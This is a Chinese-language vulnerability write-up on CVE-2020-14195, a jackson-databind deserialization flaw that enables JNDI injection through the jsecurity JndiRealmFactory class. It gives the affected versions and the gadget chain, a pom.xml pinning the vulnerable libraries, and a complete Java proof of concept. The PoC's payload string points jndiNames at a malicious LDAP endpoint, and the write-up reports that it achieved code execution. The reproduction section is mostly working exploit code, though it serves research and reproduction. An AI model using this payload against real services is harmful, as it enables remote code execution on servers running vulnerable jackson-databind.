(CVE-2020-14195)FasterXML jackson-databind 反序列化漏洞.md
2.69 KB / 2021-07-15 19:52:46
(CVE-2020-14195)FasterXML jackson-databind 反序列化漏洞
=========================================================
一、漏洞简介
------------
**利用条件**开启`enableDefaultTyping()`使用了`org.jsecurity.realm.jndi.JndiRealmFactory`第三方依赖
二、漏洞影响
------------
jackson-databind before 2.9.10.4jackson-databind before 2.8.11.6jackson-databind before 2.7.9.7
三、复现过程
------------
### 漏洞分析
首先定位到`org.jsecurity.realm.jndi.JndiRealmFactory`类,之后发现一处可疑的JNDI注入:1.png参数`name`来自i\$,而`i$`源自`jndiNames`,此时要想进入`lookup`需要满足前面的if条件语句,即`jndiNames`不为空,且不为`null`,所以我们可以在构造poc时直接对`jndiName`进行传参赋值操作即可,同时将其设置为我们的ldap恶意服务:2.png整个利用链如下所示:
mapper.readValue
->setJndiNames
->getRealms
->lookup
### 漏洞复现
> pom.xml如下:
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.4</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
<dependency>
<groupId>org.jsecurity</groupId>
<artifactId>jsecurity</artifactId>
<version>0.9.0</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
> 漏洞POC:
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\",{\"jndiNames\":\"ldap://127.0.0.1:1099/Exploit\"}]";
try {
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
} catch (IOException e) {
e.printStackTrace();
}
}
}
之后运行该程序,成功执行命令,弹出计算器:
3.png
参考链接
--------
> https://xz.aliyun.com/t/8012\#toc-18